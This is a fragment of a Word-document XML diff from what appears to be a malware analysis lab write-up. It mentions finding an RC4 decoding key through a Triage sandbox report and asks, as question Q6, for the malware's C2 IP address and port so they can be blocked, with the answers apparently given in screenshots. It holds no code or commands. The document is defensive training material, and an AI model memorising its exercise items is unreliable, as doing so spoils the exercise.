+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>resolve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>check</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2800,125 +3678,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="43"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Khi kiểm tra </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Recorded</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Future</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Triage</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>report</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, ta dễ dàng phân tích </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">được </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>khóa RC4 nào được phần mềm độc hại sử dụng để giải mã chuỗi mã hóa base64</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -2932,10 +3691,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4AEDAB" wp14:editId="0781D60F">
-            <wp:extent cx="5943600" cy="2850515"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
-            <wp:docPr id="645027031" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BF4C263" wp14:editId="6DFDEF2D">
+            <wp:extent cx="5943600" cy="2651125"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1830938199" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2943,7 +3702,1092 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="645027031" name=""/>
+                    <pic:cNvPr id="1830938199" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2651125"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Once</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malicious</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>addresses</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>are</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identified</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>devices</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>such</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>as</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>firewalls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can be </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>configured</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>block</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>traffic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>these</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>addresses</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>destination</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>communicates</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FD8870B" wp14:editId="12447424">
+            <wp:extent cx="5943600" cy="2860040"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="224624606" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="224624606" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2860040"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
